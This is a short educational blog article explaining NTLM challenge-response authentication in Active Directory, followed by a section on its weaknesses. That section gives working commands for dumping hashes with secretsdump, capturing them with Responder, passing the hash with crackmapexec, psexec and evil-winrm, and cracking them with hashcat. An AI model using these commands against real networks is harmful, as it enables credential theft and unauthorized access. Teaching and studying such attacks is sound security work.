Open in app

Sign up

Sign in

Write

Sign up

Sign in

NTLM Authentication in Active Directory

Hacktivities
InfoSec Write-ups
Published in
4 min readJun 12, 2022

--

This article provides a basic overview of how New Technology LAN Manager (NTLM) authentication works. In this article, we will explore the basic functionality of NTLM authentication and how it is used in Active Directory. NTLM Authentication is a large topic and this article will only cover the fundamentals, so with that being said, lets dive in!

What is NTLM?

In my last article titled “Kerberos Authentication in Active Directory”, I mentioned that the other main type of authentication in place for Active Directory was NTLM. Microsoft describes NTLM as follows:

The NTLM authentication protocols authenticate users and computers based on a challenge/response mechanism that proves to a server or domain controller that a user knows the password associated with an account.

NTLM is a single sign on (SSO) tool that relies on a challenge-response protocol to confirm the user with a password hash, avoiding the need to send unprotected passwords over the network. While NTLM is still supported by Microsoft, it is an outdated protocol which has been replaced by Kerberos as the default authentication protocol in Windows 2000 and subsequent Active Directory (AD) domains.

Why is NTLM Still Used?

Despite being replaced by Kerberos as the default authentication protocol and having multiple vulnerabilities, NTLM is still maintained on all Windows systems. This is mainly due to the following reasons:

  • Compatibility purposes between older clients and servers.
  • NTLM authentication is still supported and must be used for Windows authentication with systems configured as a member of a workgroup.
  • NTLM authentication is used for local logon authentication on non-domain controllers.

How does NTLM Authentication work in an AD Environment?

NTLM Authentication allows the application server to play the role of a middle man between the client and AD. All authentication material is forwarded to a Domain Controller in the form of a challenge, and if completed successfully, the application server will authenticate the user. NTLM authenticates users through a challenge-response mechanism. This process consists of three messages:

  1. Negotiation message from the client
  2. Challenge message from the server
  3. Authentication message from the client

NTLM authentication follows the following step-by-step process:

  1. The user shares their username, password and domain name with the client.
  2. The client develops a scrambled version of the password — or hash — and deletes the full password.
  3. The client passes a plain text version of the username to the relevant application server.
  4. The application server replies to the client with a challenge, which is a 16-byte random number.
  5. In response, the client sends the challenge encrypted by the hash of the user’s password.
  6. The application server then sends the challenge, response and username to the domain controller (DC).
  7. The DC retrieves the user’s password from the database and uses it to encrypt the challenge.
  8. The DC then compares the encrypted challenge and client response. If these two pieces match, then the user is authenticated and access is granted.

The sequence diagram below illustrates the steps outlined above.

NTLM Authentication sequence diagram example.

NTLM Security Vulnerabilities

NTLM is an outdated protocol and has multiple security vulnerabilities which can be exploited by attackers. I have provided a few examples of security vulnerabilities related to NTLM.

Pass-The-Hash Attack

Pass the Hash attack is a technique whereby an attacker captures a password hash (as opposed to the password characters) and then simply passes it through for authentication and potentially lateral access to other networked systems. NTLM hashes can be obtained by using tools like “secretsdump.py” within Impacket to dump hashes on a compromised machine.

sudo python3 secretsdump.py domain/user:password@192.168.57.141

LLMNR Poisoning can also be performed with Responder to capture hashes.

python3 Responder.py -I tun0 -rdwv
NTLMv2 Hash Captured by Responder.

There are multiple tools that can then be used to perform a pass the hash attack, including Evil-WinRM, crackmapexec, and psexec.py.

# -H : hash
crackmapexec smb 10.0.3.0/24 -u "John" -H <hash> --local-auth# Can use psexec to create shell using a hash
psexec.py "John":@192.168.57.141 -hashes <hash># alternative tool for pass the hash attack
evil-winrm -u Administrator -H <hash> -i 10.10.25.158

Outdated Cryptography

NTLM uses outdated cryptography and does not leverage the latest advances in algorithmic thinking or encryption to make passwords more secure. Tools such as hashcat can be used to crack captured NTLMv2 hashes and retrieve use passwords with ease.

hashcat64.exe -m 5600 hash.txt rockyou.txt
Cracked NTLMv2 hash.

Closing Remarks

Hopefully this short article on NTLM authentication has helped provide a basic overview of what it is and how it works. Despite being replaced by Kerberos, NTLM Authentication is still used widely by the majority of large companies that utilize Active Directory. Thank you for reading till the end and keep hacking! 😄

Active Directory
Network Security
Ntlm
Cybersecurity
Technology

--

--

Hacktivities
InfoSec Write-ups
Follow

Written by Hacktivities

3.9K Followers

Interested in all things Cyber Security and Technology.

Follow

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams